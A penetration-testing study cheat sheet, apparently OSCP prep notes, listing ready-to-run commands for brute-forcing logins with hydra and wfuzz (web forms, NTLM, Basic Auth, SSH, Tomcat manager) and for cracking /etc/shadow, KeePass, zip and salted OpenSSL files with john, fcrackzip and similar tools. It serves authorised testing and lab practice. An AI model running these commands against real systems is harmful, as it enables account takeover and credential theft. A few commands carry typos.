OSCP
Search…
Brute Force

Weak Credentials

HTTP Brute Force
  • wfuzz POST
wfuzz --hc 404 -c -z list,admin -z file,/root/Documents/SecLists/Passwords/korelogic-password.txt -d "user=FUZZ&password=FUZ2Z" http://ip/admin/index.php
  • hydra POST
hydra ip -s 80 http-form-post "/admin/index.php:user=^USER^&password=^PASS^:Moved Temporarily" -l admin -P /root/Documents/SecLists/Passwords/korelogic-password.txt -t 20
  • wfuzz NTLM
wfuzz -c --ntlm "admin:FUZZ" -z file,/root/Documents/SecLists/Passwords/darkc0de.txt --hc 401 https://<ip>/api
  • wfuzz Basic Auth through Proxy
wfuzz -c --hc 404,400,401 -z file,/root/Documents/Audits/Activos/names.txt -z file,/root/Documents/Audits/Activos/names.txt --basic "FUZZ:FUZ2Z" -p 127.0.0.1:8080 https://<ip>/api/v1/
Password Cracking
  • zip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip
  • /etc/shadow
1
unshadow passwd shadow > passwords
2
john --wordlist=/usr/share/wordlists/rockyou.txt passwords
Copied!
  • keepass
1
keepass2john /root/Desktop/NewDatabase.kdb > file
2
john -incremental:alpha -format=keepass file
Copied!
  • Bruteforce Salted
1
for j in $(cat cipher); do echo $j; for i in $(cat digestion); do /root/Documents/HTB/Hawk/bruteforce-salted-openssl/bruteforce-salted-openssl -t 10 -f /usr/share/wordlists/rockyou.txt -c $j -d $i ../miau.txt -1 2>&1 | grep "candidate" ; done ; done
Copied!
1
openssl aes-256-cbc -d -in ../miau.txt -out result.txt -k friends
Copied!
Port 22
1
hydra -f -V -t 1 -C /usr/share/SecLists-5c9217fe8e930c41d128aacdc68cbce7ece96e4f/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt -s 22 $IP ssh
2
Copied!
Hydra for login bypass
1
Hydra for login bypass:
2
hydra http://XXXX http-form-post "/TARGETPATH/TARGETPAGE.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt
3
hrydra -C /seclist/tomcat-betterdefaultpasslist http-get://ip:port/manager/html
4
hydra -C /root/attacker-framework/SecLists/Passwords/Default-Cr edentials/tomcat-betterdefaultpasslist.txt http-get://ip:8080/manager/html
Copied!
Zip file Bruteforce
1
fcrackzip -D -v -u -p /usr/share/wordlists/rockyou.txt backup.zip
2
Copied!
John
1
john --wordlist=/usr/share/wordlists/rockyou.txt keepass-hash.txt
2
Copied!
Last modified 1yr ago
Copy link